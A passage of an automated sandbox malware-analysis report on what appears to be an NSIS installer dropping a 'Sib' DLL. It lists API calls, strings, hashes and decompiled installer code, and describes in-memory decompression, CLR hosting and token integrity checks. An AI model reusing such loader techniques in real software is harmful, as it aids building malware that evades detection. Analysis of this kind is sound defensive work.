                                                                                                                0x00405a58
                                                                                                                0x00405a61
                                                                                                                0x00405a61
                                                                                                                0x00405a67
                                                                                                                0x00405a8f
                                                                                                                0x00405a97
                                                                                                                0x00000000
                                                                                                                0x00405a79
                                                                                                                0x00405a7a
                                                                                                                0x00405a83
                                                                                                                0x00405a89
                                                                                                                0x00405a8a
                                                                                                                0x00000000
                                                                                                                0x00405a8a
                                                                                                                0x00405a85
                                                                                                                0x00405a87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a87
                                                                                                                0x00405a67

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNEL32(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98), ref: 004059DA
                                                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                • LoadImageW.USER32 ref: 00405AE3
                                                                                                                • RegisterClassW.USER32 ref: 00405B36
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                • CreateWindowExW.USER32 ref: 00405B87
                                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                • GetClassInfoW.USER32 ref: 00405BE9
                                                                                                                • GetClassInfoW.USER32 ref: 00405BF6
                                                                                                                • RegisterClassW.USER32 ref: 00405BFF
                                                                                                                • DialogBoxParamW.USER32 ref: 00405C1E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                • API String ID: 608394941-2746725676
                                                                                                                • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FECAE70, Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 187memorylibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,3A83C854), ref: 6FECAEA4
                                                                                                                • VirtualAlloc.KERNEL32(00000000,06000000,00003000,00000004), ref: 6FECB097
                                                                                                                • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6FECB0AC
                                                                                                                • GetLastError.KERNEL32 ref: 6FECAEB3
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 6FECAF08
                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 6FECAF1C
                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 6FECAF31
                                                                                                                • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6FECAF5D
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 6FECAFB9
                                                                                                                • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6FECAFCE
                                                                                                                • VirtualAlloc.KERNEL32(00000000,05C00000,00003000,00000004), ref: 6FECB028
                                                                                                                • GetLastError.KERNEL32(?,?,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp), ref: 6FECB03D
                                                                                                                Strings
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6FECAFD7
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6FECAEBC
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6FECB0B5
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6FECAF66
                                                                                                                • RtlGetCompressionWorkSpaceSize, xrefs: 6FECAF13
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp, xrefs: 6FECB046
                                                                                                                • ntdll.dll, xrefs: 6FECAE9F
                                                                                                                • RtlCompressBuffer, xrefs: 6FECAEFF
                                                                                                                • RtlDecompressBuffer, xrefs: 6FECAF28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AddressAllocProcVirtual$Base::Concurrency::details::ContextHandleIdentityModuleQueueWork
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                                                                                • API String ID: 1508282030-1192085491
                                                                                                                • Opcode ID: 384f96c8fecd683ba5048f10f4008af3b6d01722b04d223cc56f8d4842cdc375
                                                                                                                • Instruction ID: 4d90e4a4498f531cc6314620098b29715add0e04e8bb1c270182cea7bbaef6cb
                                                                                                                • Opcode Fuzzy Hash: 384f96c8fecd683ba5048f10f4008af3b6d01722b04d223cc56f8d4842cdc375
                                                                                                                • Instruction Fuzzy Hash: 078106B0D0020AEFDB04DFA4DD55BAEBBB1BF48314F20452DE525AB2D0DBB16A01CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA3410, Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 250memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA34D2
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6FEA34F8
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,000000FF,3A83C854), ref: 6FEA36C8
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000000,000000FF,3A83C854), ref: 6FEA3705
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AllocatorDebugHeapstd::ios_base::good
                                                                                                                • String ID: %s\%d$Action: %s...$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$InitSession$Installation aborted$Installation canceled.$Installation complete.$Starting Installation.$Starting Uninstallation.$Uninstallation complete.$cond_pkg
                                                                                                                • API String ID: 2253133653-213843563
                                                                                                                • Opcode ID: 4148d6e0d62f25f10fd0b28950a8e2999aa7a73932e949e29738f10910aaa555
                                                                                                                • Instruction ID: e48c34343ff69171c9a8e0b03f05b3933b552ffa54dce2d57f63aac9b496028c
                                                                                                                • Opcode Fuzzy Hash: 4148d6e0d62f25f10fd0b28950a8e2999aa7a73932e949e29738f10910aaa555
                                                                                                                • Instruction Fuzzy Hash: 86A15EB0D04205AFDB08DFA8D952BAEBBB5AF45318F20412DE4116F3D0DB37A941CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEB1660, Relevance: 25.6, APIs: 17, Instructions: 118threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6FEB1683
                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 6FEB168A
                                                                                                                • GetLastError.KERNEL32 ref: 6FEB1694
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 6FEB16AE
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 6FEB16B5
                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 6FEB16D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Token$CurrentOpenProcessThread$ErrorInformationLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 632756016-0
                                                                                                                • Opcode ID: 4043cca7966b552095d8e0bd74b3f4a41b51246da974fa406d9698fbfb4876e5
                                                                                                                • Instruction ID: 608de039006b50ecd89539c58a0767f316290016c53093c0faacaa20064a1f67
                                                                                                                • Opcode Fuzzy Hash: 4043cca7966b552095d8e0bd74b3f4a41b51246da974fa406d9698fbfb4876e5
                                                                                                                • Instruction Fuzzy Hash: 63412E74A1061AEFDF00DBF8CE58B9E7BB8BF4A315F64465CE101D7250D7B499448B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401A1F, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E00401A1F(FILETIME* __ebx) {
				signed int _t31;
				void* _t35;
				void* _t43;
				void* _t45;
				void* _t51;
				void* _t67;
				void* _t74;
				FILETIME* _t83;
				signed int _t94;
				void* _t96;
				void* _t98;
				WCHAR* _t100;
				WCHAR* _t101;
				void* _t103;

				_t83 = __ebx;
				_t100 = E0040145C(_t96, 0x31);
				_t31 =  *(_t103 - 0x2c);
				_push(_t100);
				_push(_t31 >> 0x00000003 & 0x00000002);
				 *(_t103 - 0x34) = _t100;
				 *(_t103 + 8) = _t31 & 0x00000007;
				E004062CF(L"File: overwriteflag=%d, allowskipfilesflag=%d, name=\"%s\"", _t31 & 0x00000007);
				_t35 = E00405D51(_t100);
				_push(_t100);
				_t101 = L"install";
				if(_t35 == 0) {
					lstrcatW(E0040674E(E00406035(_t101, 0x4d70b0)), ??);
				} else {
					E00406035();
				}
				E00406064(_t101);
				L6:
				L6:
				if( *(_t103 + 8) >= 3) {
					_t74 = E00406301(_t101);
					_t94 = 0;
					if(_t74 != _t83) {
						_t94 = CompareFileTime(_t74 + 0x14, _t103 - 0x20);
					}
					asm("sbb eax, eax");
					 *(_t103 + 8) =  ~(( *(_t103 + 8) + 0xfffffffd | 0x80000000) & _t94) + 1;
				}
				if( *(_t103 + 8) == _t83) {
					E00405E5C(_t101);
				}
				_t43 = E00405E7C(_t101, 0x40000000, (0 |  *(_t103 + 8) != 0x00000001) + 1);
				 *(_t103 - 8) = _t43;
				if(_t43 != 0xffffffff) {
					goto L24;
				}
				if( *(_t103 + 8) != _t83) {
					E00404F9E(0xffffffe2,  *(_t103 - 0x34));
					if( *(_t103 + 8) == 2) {
						 *((intOrPtr*)(_t103 - 4)) = 1;
					}
					_push( *(_t103 + 8));
					_push(_t101);
					_push(L"File: skipped: \"%s\" (overwriteflag=%d)");
					E004062CF();
					L33:
					 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t103 - 4));
					goto L34;
				} else {
					E004062CF(L"File: error creating \"%s\"", _t101);
					E00406035(0x4140f8, 0x47f000);
					E00406035(0x47f000, _t101);
					E00406831(_t83, 0x4140f8, _t101, 0x4100f0,  *((intOrPtr*)(_t103 - 0x18)));
					E00406035(0x47f000, 0x4140f8);
					_t67 = E00405CCC(0x4100f0,  *(_t103 - 0x2c) >> 3) - 4;
					if(_t67 != 0) {
						if(_t67 == 1) {
							_push(L"File: error, user cancel");
							E004062CF();
							 *0x47eb68 =  *0x47eb68 + 1;
							L34:
							_t51 = 0;
						} else {
							_push(L"File: error, user abort");
							E004062CF();
							_push(_t101);
							_push(0xfffffffa);
							E00404F9E();
							L2:
							_t51 = 0x7fffffff;
						}
					} else {
						_push(L"File: error, user retry");
						E004062CF();
						goto L6;
					}
				}
				L35:
				return _t51;
				L24:
				E00404F9E(0xffffffea,  *(_t103 - 0x34));
				 *0x47eb94 =  *0x47eb94 + 1;
				_t45 = E0040337F( *((intOrPtr*)(_t103 - 0x24)),  *(_t103 - 8), _t83, _t83); // executed
				 *0x47eb94 =  *0x47eb94 - 1;
				_t98 = _t45;
				_push(_t101);
				E004062CF(L"File: wrote %d to \"%s\"", _t98);
				if( *(_t103 - 0x20) != 0xffffffff ||  *((intOrPtr*)(_t103 - 0x1c)) != 0xffffffff) {
					SetFileTime( *(_t103 - 8), _t103 - 0x20, _t83, _t103 - 0x20);
				}
				FindCloseChangeNotification( *(_t103 - 8)); // executed
				if(_t98 >= _t83) {
					goto L33;
				} else {
					if(_t98 != 0xfffffffe) {
						E00406831(_t83, _t98, _t101, _t101, 0xffffffee);
					} else {
						E00406831(_t83, _t98, _t101, _t101, 0xffffffe9);
						lstrcatW(_t101,  *(_t103 - 0x34));
					}
					E004062CF(L"%s", _t101);
					_push(0x200010);
					_push(_t101);
					E00405CCC();
					goto L2;
				}
				goto L35;
			}

















                                                                                                                0x00401a1f
                                                                                                                0x00401a26
                                                                                                                0x00401a28
                                                                                                                0x00401a30
                                                                                                                0x00401a37
                                                                                                                0x00401a3e
                                                                                                                0x00401a41
                                                                                                                0x00401a44
                                                                                                                0x00401a4d
                                                                                                                0x00401a52
                                                                                                                0x00401a53
                                                                                                                0x00401a5a
                                                                                                                0x00401a76
                                                                                                                0x00401a5c
                                                                                                                0x00401a5d
                                                                                                                0x00401a5d
                                                                                                                0x00401a7c
                                                                                                                0x00000000
                                                                                                                0x00401a86
                                                                                                                0x00401a8a
                                                                                                                0x00401a8d
                                                                                                                0x00401a92
                                                                                                                0x00401a96
                                                                                                                0x00401aa6
                                                                                                                0x00401aa6
                                                                                                                0x00401ab7
                                                                                                                0x00401aba
                                                                                                                0x00401aba
                                                                                                                0x00401ac0
                                                                                                                0x00401ac3
                                                                                                                0x00401ac3
                                                                                                                0x00401ad9
                                                                                                                0x00401ade
                                                                                                                0x00401ae4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401aed
                                                                                                                0x00401b6b
                                                                                                                0x00401b74
                                                                                                                0x00401b76
                                                                                                                0x00401b76
                                                                                                                0x00401b7d
                                                                                                                0x00401b80
                                                                                                                0x00401b81
                                                                                                                0x00401b86
                                                                                                                0x004030e3
                                                                                                                0x004030e6
                                                                                                                0x00000000
                                                                                                                0x00401aef
                                                                                                                0x00401af5
                                                                                                                0x00401b02
                                                                                                                0x00401b0d
                                                                                                                0x00401b1a
                                                                                                                0x00401b25
                                                                                                                0x00401b3b
                                                                                                                0x00401b3e
                                                                                                                0x00401b51
                                                                                                                0x00401b93
                                                                                                                0x00401b98
                                                                                                                0x00401b9d
                                                                                                                0x004030ec
                                                                                                                0x004030ec
                                                                                                                0x00401b53
                                                                                                                0x00401b53
                                                                                                                0x00401b58
                                                                                                                0x00401b5e
                                                                                                                0x00401b5f
                                                                                                                0x0040162d
                                                                                                                0x00401632
                                                                                                                0x00401632
                                                                                                                0x00401632
                                                                                                                0x00401b40
                                                                                                                0x00401b40
                                                                                                                0x00401b45
                                                                                                                0x00000000
                                                                                                                0x00401b4a
                                                                                                                0x00401b3e
                                                                                                                0x004030ee
                                                                                                                0x004030f2
                                                                                                                0x00401ba9
                                                                                                                0x00401bae
                                                                                                                0x00401bb3
                                                                                                                0x00401bc1
                                                                                                                0x00401bc6
                                                                                                                0x00401bcc
                                                                                                                0x00401bce
                                                                                                                0x00401bd5
                                                                                                                0x00401be1
                                                                                                                0x00401bf2
                                                                                                                0x00401bf2
                                                                                                                0x00401bfb
                                                                                                                0x00401c03
                                                                                                                0x00000000
                                                                                                                0x00401c09
                                                                                                                0x00401c0c
                                                                                                                0x00401c24
                                                                                                                0x00401c0e
                                                                                                                0x00401c11
                                                                                                                0x00401c1a
                                                                                                                0x00401c1a
                                                                                                                0x00401c2f
                                                                                                                0x00401c36
                                                                                                                0x00401c3b
                                                                                                                0x00401c3c
                                                                                                                0x00000000
                                                                                                                0x00401c3c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,install,install,00000000,00000000,install,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425AD2,7519EA30,00000000), ref: 00404FD6
                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,7519EA30,00000000), ref: 00404FE6
                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$install
                                                                                                                • API String ID: 4286501637-2455569613
                                                                                                                • Opcode ID: 23359e57e86623cb041ae238ad4d2dfc68e00f0e31f0802a264bc06316deb979
                                                                                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                • Opcode Fuzzy Hash: 23359e57e86623cb041ae238ad4d2dfc68e00f0e31f0802a264bc06316deb979
                                                                                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEAA240, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 170memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6FEA9B60: SysAllocString.OLEAUT32(?), ref: 6FEA9B9A
                                                                                                                  • Part of subcall function 6FEA9B60: SysAllocString.OLEAUT32(00000000), ref: 6FEA9C35
                                                                                                                  • Part of subcall function 6FEA9B60: SysAllocString.OLEAUT32(00000000), ref: 6FEA9CD4
                                                                                                                • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6FEAA2A4
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 6FEAA2BA
                                                                                                                • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6FEAA2D6
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 6FEAA2FA
                                                                                                                • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6FEAA319
                                                                                                                • VariantClear.OLEAUT32(?), ref: 6FEAA418
                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 6FEAA422
                                                                                                                Strings
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEAA42E
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6FEAA3C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$ArraySafe$Element$ClearCreateDestroyVariantVector
                                                                                                                • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp
                                                                                                                • API String ID: 1364862699-1439456480
                                                                                                                • Opcode ID: a09e1992665717a91f7a0ee06dba292d5380a67222ab1c8bacaa810eb9e0ffd7
                                                                                                                • Instruction ID: 560c03494e38eeaf3ff6a52bb0b4fa4149a86f11f3763df85ee529c80b09374c
                                                                                                                • Opcode Fuzzy Hash: a09e1992665717a91f7a0ee06dba292d5380a67222ab1c8bacaa810eb9e0ffd7
                                                                                                                • Instruction Fuzzy Hash: E071F4B1D10609DFCB04DFA8C994BEEBBB5BF48310F20862DE515AB280DBB56A45CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEB0B60, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 264memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB0C3C
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEB0C8C
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104,00000104,3A83C854), ref: 6FEB0CCA
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000104,3A83C854), ref: 6FEB0CF7
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEB0D17
                                                                                                                • ~.LIBCPMTD ref: 6FEB0DC8
                                                                                                                • task.LIBCPMTD ref: 6FEB0DD4
                                                                                                                • task.LIBCPMTD ref: 6FEB0E0A
                                                                                                                  • Part of subcall function 6FEA8FF0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA9045
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWorktask$EnvironmentExpandFolderPathStrings
                                                                                                                • String ID: "$8O{$PkgDir$Temp
                                                                                                                • API String ID: 4116297666-2159784578
                                                                                                                • Opcode ID: 22fe0db91927d3c07af92218c3fe71f97870d2b706ab3c813ee0fcdf7232f6b9
                                                                                                                • Instruction ID: 2b8c7e28f7bb949906620e025ffb4017b39f8d2cc9c50e1bcf21259f78864f87
                                                                                                                • Opcode Fuzzy Hash: 22fe0db91927d3c07af92218c3fe71f97870d2b706ab3c813ee0fcdf7232f6b9
                                                                                                                • Instruction Fuzzy Hash: 19B16E70D04218DFDB24CBA8CE90BEDBB75BF45318F6082ADD159AB292DB316A44CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA55A0, Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 200filememoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6FEA5860: _DebugHeapAllocator.LIBCPMTD ref: 6FEA58B5
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
